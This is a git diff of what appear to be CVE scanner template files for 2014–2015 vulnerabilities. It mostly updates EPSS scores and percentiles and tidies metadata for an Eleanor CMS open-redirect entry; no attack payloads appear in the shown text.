+++ b/http/cves/2014/CVE-2014-8676.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-8676 cwe-id: CWE-22 epss-score: 0.00195 - epss-percentile: 0.56565 + epss-percentile: 0.57069 cpe: cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index be78e830b2..f9044bb699 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-8682 cwe-id: CWE-89 epss-score: 0.00808 - epss-percentile: 0.79567 + epss-percentile: 0.79805 cpe: cpe:2.3:a:gogits:gogs:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index 54d4b7f104..f087b21f39 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-8799 cwe-id: CWE-22 epss-score: 0.17844 - epss-percentile: 0.9547 + epss-percentile: 0.95546 cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index 6199cfa084..85f15c0ba2 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9094 cwe-id: CWE-79 epss-score: 0.83554 - epss-percentile: 0.98005 + epss-percentile: 0.98052 cpe: cpe:2.3:a:digitalzoomstudio:video_gallery:-:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9119.yaml b/http/cves/2014/CVE-2014-9119.yaml index 961d60cf26..93eb1354b4 100644 --- a/http/cves/2014/CVE-2014-9119.yaml +++ b/http/cves/2014/CVE-2014-9119.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5 cve-id: CVE-2014-9119 cwe-id: CWE-22 - epss-score: 0.30825 - epss-percentile: 0.96385 + epss-score: 0.24305 + epss-percentile: 0.96055 cpe: cpe:2.3:a:db_backup_project:db_backup:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml index 2eb77dea8a..10671c05ce 100644 --- a/http/cves/2014/CVE-2014-9180.yaml +++ b/http/cves/2014/CVE-2014-9180.yaml @@ -6,23 +6,26 @@ info: severity: medium description: | Open redirect vulnerability in go.php in Eleanor CMS allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the QUERY_STRING. + remediation: | + Update to the latest version of Eleanor CMS to fix the open redirect vulnerability. reference: - https://packetstormsecurity.com/files/129087/Eleanor-CMS-Open-Redirect.html - https://nvd.nist.gov/vuln/detail/CVE-2014-9180 - remediation: | - Update to the latest version of Eleanor CMS to fix the open redirect vulnerability. classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/Au:N/C:N/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:N/I:P/A:N cvss-score: 5 cve-id: CVE-2014-9180 cwe-id: CWE-601 + epss-score: 0.00248 + epss-percentile: 0.62395 + cpe: cpe:2.3:a:eleanor-cms:eleanor_cms:-:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: eleanor-cms product: eleanor_cms shodan-query: html:"eleanor" - vendor: eleanor-cms - verified: true - tags: cve,cve2014,eleanor,cms,redirect + tags: packetstorm,cve,cve2014,eleanor,cms,redirect http: - method: GET diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index 9dc8fc2c8f..63cfe2dc2f 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9444 cwe-id: CWE-79 epss-score: 0.00287 - epss-percentile: 0.64821 + epss-percentile: 0.65219 cpe: cpe:2.3:a:frontend_uploader_project:frontend_uploader:0.9.2:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml index d160d3aa60..bbfb148b75 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9606 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.40937 + epss-percentile: 0.41242 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index dd8558cb5d..74e5f92b20 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9607 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.40937 + epss-percentile: 0.41242 cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index 8c996fff52..fad884af74 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-9608 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.40937 + epss-percentile: 0.41242 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9609.yaml b/http/cves/2014/CVE-2014-9609.yaml index fd452bcc1c..cda05fe86e 100644 --- a/http/cves/2014/CVE-2014-9609.yaml +++ b/http/cves/2014/CVE-2014-9609.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9609 cwe-id: CWE-22 epss-score: 0.00212 - epss-percentile: 0.5835 + epss-percentile: 0.58757 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index 0d67065af3..787126a1d1 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9614 cwe-id: CWE-798 epss-score: 0.01433 - epss-percentile: 0.84911 + epss-percentile: 0.85073 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9615.yaml b/http/cves/2014/CVE-2014-9615.yaml index 642c6bb209..9182785281 100644 --- a/http/cves/2014/CVE-2014-9615.yaml +++ b/http/cves/2014/CVE-2014-9615.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9615 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.40937 + epss-percentile: 0.41242 cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index b55457effa..858de22d85 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9617 cwe-id: CWE-601 epss-score: 0.00109 - epss-percentile: 0.43264 + epss-percentile: 0.4364 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index 5e985faeaa..0076fa0f04 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-9618 cwe-id: CWE-287 epss-score: 0.03433 - epss-percentile: 0.90239 + epss-percentile: 0.90372 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-0554.yaml b/http/cves/2015/CVE-2015-0554.yaml index 7cffd109d6..22ff0beca9 100644 --- a/http/cves/2015/CVE-2015-0554.yaml +++ b/http/cves/2015/CVE-2015-0554.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-0554 cwe-id: CWE-264 epss-score: 0.0196 - epss-percentile: 0.87242 + epss-percentile: 0.87388 cpe: cpe:2.3:o:adb:p.dga4001n_firmware:pdg_tef_sp_4.06l.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml index d4c3cf6cf2..b31b1f96b0 100644 --- a/http/cves/2015/CVE-2015-1000005.yaml +++ b/http/cves/2015/CVE-2015-1000005.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2015-1000005 cwe-id: CWE-22 - epss-score: 0.04406 - epss-percentile: 0.91313 + epss-score: 0.05243 + epss-percentile: 0.92144 cpe: cpe:2.3:a:candidate-application-form_project:candidate-application-form:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-1000010.yaml b/http/cves/2015/CVE-2015-1000010.yaml index 61b0e64116..c018d2e632 100644 --- a/http/cves/2015/CVE-2015-1000010.yaml +++ b/http/cves/2015/CVE-2015-1000010.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2015-1000010 cwe-id: CWE-284 - epss-score: 0.02653 - epss-percentile: 0.8903 + epss-score: 0.03171 + epss-percentile: 0.90009 cpe: cpe:2.3:a:simple-image-manipulator_project:simple-image-manipulator:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-1000012.yaml b/http/cves/2015/CVE-2015-1000012.yaml index efe1e33d5d..8b0e488351 100644 --- a/http/cves/2015/CVE-2015-1000012.yaml +++ b/http/cves/2015/CVE-2015-1000012.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-1000012 cwe-id: CWE-200 epss-score: 0.00773 - epss-percentile: 0.79053 + epss-percentile: 0.79275 cpe: cpe:2.3:a:mypixs_project:mypixs:0.3:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index d399110245..95c56ce96d 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2015-1427 cwe-id: CWE-284 - epss-score: 0.88469 - epss-percentile: 0.98266 + epss-score: 0.8674 + epss-percentile: 0.98224 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index b380e3ac89..fd0ec0d06d 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2015-1503 cwe-id: CWE-22 - epss-score: 0.94041 - epss-percentile: 0.98821 + epss-score: 0.93087 + epss-percentile: 0.98748 cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml index 7ff4adfddd..1d92fc0edc 100644 --- a/http/cves/2015/CVE-2015-1579.yaml +++ b/http/cves/2015/CVE-2015-1579.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-1579 cwe-id: CWE-22 epss-score: 0.92959 - epss-percentile: 0.98662 + epss-percentile: 0.98731 cpe: cpe:2.3:a:elegant_themes:divi:-:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index 7f01c95b62..68f94131ef 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-1880 cwe-id: CWE-79 epss-score: 0.00201 - epss-percentile: 0.57316 + epss-percentile: 0.57719 cpe: cpe:2.3:o:fortinet:fortios:5.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index 2af232eb45..0b70e5c7fa 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2015-2067 cwe-id: CWE-22 epss-score: 0.01338 - epss-percentile: 0.84395 + epss-percentile: 0.84556 cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index 706a718ccd..e0dcbec431 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2015-2068 cwe-id: CWE-79 epss-score: 0.00146 - epss-percentile: 0.49807 + epss-percentile: 0.50173 cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-2080.yaml b/http/cves/2015/CVE-2015-2080.yaml index 37d4313125..bce3c926f0 100644 --- a/http/cves/2015/CVE-2015-2080.yaml +++ b/http/cves/2015/CVE-2015-2080.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-2080 cwe-id: CWE-200 epss-score: 0.95465 - epss-percentile: 0.99111 + epss-percentile: 0.99156 cpe: cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml index eadcb4dc26..d5f6d866de 100644 --- a/http/cves/2015/CVE-2015-2166.yaml +++ b/http/cves/2015/CVE-2015-2166.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-2166 cwe-id: CWE-22 epss-score: 0.27262 - epss-percentile: 0.96165 + epss-percentile: 0.96225 cpe: cpe:2.3:a:ericsson:drutt_mobile_service_delivery_platform:4.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index 19ac1c3385..f57b42a0b7 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-2196 cwe-id: CWE-89 epss-score: 0.0093 - epss-percentile: 0.81015 + epss-percentile: 0.81232 cpe: cpe:2.3:a:web-dorado:spider_calendar:1.4.9:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index d95d57a549..e6f74d46e7 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-2755 cwe-id: CWE-352 epss-score: 0.02569 - epss-percentile: 0.88871 + epss-percentile: 0.89021 cpe: cpe:2.3:a:ab_google_map_travel_project:ab_google_map_travel:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index 86268aad8b..d9eb7c39ab 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-2807 cwe-id: CWE-79 epss-score: 0.00665 - epss-percentile: 0.77092 + epss-percentile: 0.77356 cpe: cpe:2.3:a:documentcloud:navis_documentcloud:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml index 124d095290..5d6195d6cc 100644 --- a/http/cves/2015/CVE-2015-2863.yaml +++ b/http/cves/2015/CVE-2015-2863.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-2863 cwe-id: CWE-601 epss-score: 0.00626 - epss-percentile: 0.76316 + epss-percentile: 0.76576 cpe: cpe:2.3:a:kaseya:virtual_system_administrator:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml index 9e3ac2d7fe..7affb094f7 100644 --- a/http/cves/2015/CVE-2015-2996.yaml +++ b/http/cves/2015/CVE-2015-2996.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-2996 cwe-id: CWE-22 epss-score: 0.77754 - epss-percentile: 0.97813 + epss-percentile: 0.97859 cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml index 895672cc94..e3aa47f538 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-3035 cwe-id: CWE-22 epss-score: 0.58993 - epss-percentile: 0.97296 + epss-percentile: 0.97353 cpe: cpe:2.3:o:tp-link:tl-wr841n_\(9.0\)_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml index c749df2ac1..cfd5c6edb6 100644 --- a/http/cves/2015/CVE-2015-3224.yaml +++ b/http/cves/2015/CVE-2015-3224.yaml @@ -18,8 +18,8 @@ info: cvss-score: 4.3 cve-id: CVE-2015-3224 cwe-id: CWE-284 - epss-score: 0.93656 - epss-percentile: 0.98766 + epss-score: 0.92962 + epss-percentile: 0.98731 cpe: cpe:2.3:a:rubyonrails:web_console:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index fbb582185f..5163d100b7 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-3337 cwe-id: CWE-22 epss-score: 0.96596 - epss-percentile: 0.99448 + epss-percentile: 0.99482 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-3648.yaml b/http/cves/2015/CVE-2015-3648.yaml index e83a389cf0..0ef5c5fa29 100644 --- a/http/cves/2015/CVE-2015-3648.yaml +++ b/http/cves/2015/CVE-2015-3648.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-3648 cwe-id: CWE-22 epss-score: 0.02644 - epss-percentile: 0.89012 + epss-percentile: 0.89154 cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml index 757fd29613..a9399d6819 100644 --- a/http/cves/2015/CVE-2015-3897.yaml +++ b/http/cves/2015/CVE-2015-3897.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-3897 cwe-id: CWE-22 epss-score: 0.83225 - epss-percentile: 0.97993 + epss-percentile: 0.98037 cpe: cpe:2.3:a:bonitasoft:bonita_bpm_portal:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml index 1fa80cde3b..22452929c3 100644 --- a/http/cves/2015/CVE-2015-4050.yaml +++ b/http/cves/2015/CVE-2015-4050.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-4050 cwe-id: CWE-284 epss-score: 0.00847 - epss-percentile: 0.8003 + epss-percentile: 0.80251 cpe: cpe:2.3:a:sensiolabs:symfony:2.3.19:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index 1c5d7fa538..01f351d834 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.5 cve-id: CVE-2015-4062 cwe-id: CWE-89 - epss-score: 0.03336 - epss-percentile: 0.90106 + epss-score: 0.02803 + epss-percentile: 0.89465 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml index 95b0e43b1e..1eece1b155 100644 --- a/http/cves/2015/CVE-2015-4063.yaml +++ b/http/cves/2015/CVE-2015-4063.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-4063 cwe-id: CWE-79 epss-score: 0.04016 - epss-percentile: 0.90916 + epss-percentile: 0.91035 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml index 365ca1cc3d..dc2e253631 100644 --- a/http/cves/2015/CVE-2015-4074.yaml +++ b/http/cves/2015/CVE-2015-4074.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-4074 cwe-id: CWE-22 epss-score: 0.00598 - epss-percentile: 0.75681 + epss-percentile: 0.75966 cpe: cpe:2.3:a:helpdesk_pro_project:helpdesk_pro:*:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index c1c52ef74b..3469bef715 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-4127 cwe-id: CWE-79 epss-score: 0.0034 - epss-percentile: 0.67772 + epss-percentile: 0.6813 cpe: cpe:2.3:a:church_admin_project:church_admin:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4414.yaml b/http/cves/2015/CVE-2015-4414.yaml index bd4520fd3b..dc9471fdd1 100644 --- a/http/cves/2015/CVE-2015-4414.yaml +++ b/http/cves/2015/CVE-2015-4414.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-4414 cwe-id: CWE-22 epss-score: 0.11221 - epss-percentile: 0.94441 + epss-percentile: 0.9454 cpe: cpe:2.3:a:se_html5_album_audio_player_project:se_html5_album_audio_player:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml index 734920247d..b482542e8a 100644 --- a/http/cves/2015/CVE-2015-4632.yaml +++ b/http/cves/2015/CVE-2015-4632.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2015-4632 cwe-id: CWE-22 - epss-score: 0.05668 - epss-percentile: 0.9233 + epss-score: 0.02817 + epss-percentile: 0.89492 cpe: cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index 6a9d415637..66a0099a5d 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5 cve-id: CVE-2015-4666 cwe-id: CWE-22 - epss-score: 0.03324 - epss-percentile: 0.90091 + epss-score: 0.02372 + epss-percentile: 0.886 cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml index cf5e935f94..eac7f81a60 100644 --- a/http/cves/2015/CVE-2015-4668.yaml +++ b/http/cves/2015/CVE-2015-4668.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-4668 cwe-id: CWE-601 epss-score: 0.00397 - epss-percentile: 0.70183 + epss-percentile: 0.70507 cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml index 49934d3c68..b852acb0ec 100644 --- a/http/cves/2015/CVE-2015-4694.yaml +++ b/http/cves/2015/CVE-2015-4694.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-4694 cwe-id: CWE-22 epss-score: 0.02304 - epss-percentile: 0.88284 + epss-percentile: 0.88442 cpe: cpe:2.3:a:zip_attachments_project:zip_attachments:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5354.yaml b/http/cves/2015/CVE-2015-5354.yaml index 342cc2a461..7e2a962e22 100644 --- a/http/cves/2015/CVE-2015-5354.yaml +++ b/http/cves/2015/CVE-2015-5354.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-5354 cwe-id: CWE-601 epss-score: 0.00166 - epss-percentile: 0.52595 + epss-percentile: 0.52992 cpe: cpe:2.3:a:novius-os:novius_os:5.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index ac154585d3..1c6e2108d7 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-5461 cwe-id: NVD-CWE-Other epss-score: 0.0055 - epss-percentile: 0.74565 + epss-percentile: 0.74857 cpe: cpe:2.3:a:stageshow_project:stageshow:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml index d1fbad2989..7068f48208 100644 --- a/http/cves/2015/CVE-2015-5469.yaml +++ b/http/cves/2015/CVE-2015-5469.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-5469 cwe-id: CWE-22 epss-score: 0.02176 - epss-percentile: 0.87946 + epss-percentile: 0.88106 cpe: cpe:2.3:a:mdc_youtube_downloader_project:mdc_youtube_downloader:2.1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index 6ca9367a13..50a8a7c759 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-5471 cwe-id: CWE-22 epss-score: 0.11139 - epss-percentile: 0.94418 + epss-percentile: 0.94518 cpe: cpe:2.3:a:swim_team_project:swim_team:1.44.10777:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml index 6dafb2f144..d1706ed374 100644 --- a/http/cves/2015/CVE-2015-5531.yaml +++ b/http/cves/2015/CVE-2015-5531.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5 cve-id: CVE-2015-5531 cwe-id: CWE-22 - epss-score: 0.97074 - epss-percentile: 0.99659 + epss-score: 0.97144 + epss-percentile: 0.9972 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml index bd70549171..a4c97136d7 100644 --- a/http/cves/2015/CVE-2015-5688.yaml +++ b/http/cves/2015/CVE-2015-5688.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-5688 cwe-id: CWE-22 epss-score: 0.01347 - epss-percentile: 0.84447 + epss-percentile: 0.84604 cpe: cpe:2.3:a:geddyjs:geddy:13.0.7:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-6477.yaml b/http/cves/2015/CVE-2015-6477.yaml index 3b62efb3e0..70f8c299be 100644 --- a/http/cves/2015/CVE-2015-6477.yaml +++ b/http/cves/2015/CVE-2015-6477.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-6477 cwe-id: CWE-79 epss-score: 0.00294 - epss-percentile: 0.65327 + epss-percentile: 0.65685 cpe: cpe:2.3:o:nordex:nordex_control_2_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-6544.yaml b/http/cves/2015/CVE-2015-6544.yaml index 1f58a92ffb..72acce0ba8 100644 --- a/http/cves/2015/CVE-2015-6544.yaml +++ b/http/cves/2015/CVE-2015-6544.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-6544 cwe-id: CWE-79 epss-score: 0.00284 - epss-percentile: 0.64643 + epss-percentile: 0.65039 cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml index 